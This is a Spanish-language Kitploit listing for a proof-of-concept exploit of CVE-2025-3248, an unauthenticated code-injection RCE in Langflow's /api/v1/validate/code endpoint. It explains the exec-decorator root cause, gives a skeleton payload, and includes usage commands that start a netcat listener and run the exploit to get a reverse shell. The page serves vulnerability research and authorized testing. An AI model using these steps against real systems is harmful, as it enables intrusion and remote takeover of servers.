Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/hideki233/cve-2025-3248-langflow-rce
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubhideki233/cve-2025-3248-langflow-rce

CVE-2025-3248-Langflow-RCE

Prueba de concepto de exploit para CVE-2025-3248, una vulnerabilidad de ejecución remota de código no autenticada en Langflow, que demuestra la inyección de código a través del endpoint /api/v1/validate/code.

Ver Repositorio
hace 16h 30mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-3248 — Ejecución Remota de Código No Autenticada en Langflow

Prueba de concepto (PoC) para CVE-2025-3248, una vulnerabilidad de ejecución remota de código no autenticada en Langflow, una plataforma de construcción de flujos de trabajo para IA/LLM.

  • Versiones afectadas: Langflow < 1.3.0
  • Corregido en: 1.3.0
  • Clase de vulnerabilidad: RCE no autenticada (CWE-94, Inyección de código)
  • Estado: Añadido al catálogo de vulnerabilidades explotadas conocidas de CISA tras observarse su explotación en entornos reales por botnets.

Causa raíz

Langflow expone un endpoint, POST /api/v1/validate/code, destinado a "validar" un fragmento de código Python enviado desde la interfaz de usuario (p. ej., código de componentes personalizados). Internamente analiza y compila el código con ast.parse() / compile() e informa si es válido — sin requerir autenticación.

El fallo: Python evalúa las expresiones de decoradores en tiempo de análisis/compilación, antes de que la función decorada sea llamada. Si el "código a validar" enviado contiene un decorador como:

root@kitploit:~
@exec("...código malicioso...")
def test():
    pass

la llamada a exec(...) se ejecuta en el momento en que el código se analiza — la validación nunca necesita invocar realmente a test(). Combinado con la ausencia de autenticación y de sandboxing, una única petición HTTP no autenticada es suficiente para ejecutar comandos arbitrarios en el host que ejecuta Langflow.

Uso

  1. Inicia un listener en tu máquina:
    root@kitploit:~
    nc -lvnp 9001
    
  2. Ejecuta el PoC contra un objetivo:
    root@kitploit:~
    python3 exploit.py --target http://TARGET_IP:7860 --lhost YOUR_IP --lport 9001
    
  3. Si el objetivo es vulnerable, obtendrás una shell en el listener.
root@kitploit:~
usage: exploit.py [-h] --target TARGET --lhost LHOST [--lport LPORT] [--timeout TIMEOUT]

Requisitos

root@kitploit:~
pip install requests

Aviso legal

Este código se proporciona únicamente con fines educativos y para pruebas de seguridad autorizadas (laboratorios, CTFs, compromisos con permiso escrito explícito). No lo ejecutes contra sistemas que no te pertenezcan o para los que no tengas autorización explícita para probar. El autor no se hace responsable del mal uso.

Referencias

  • Aviso de seguridad de Langflow GHSA-vwmf-pq79-vjvx
  • Horizon3.ai — Unsafe at Any Speed: Abusing Python Exec for Unauth RCE in Langflow AI
  • Keysight — CVE-2025-3248: Langflow Unauthenticated Code Validation
Descargar herramienta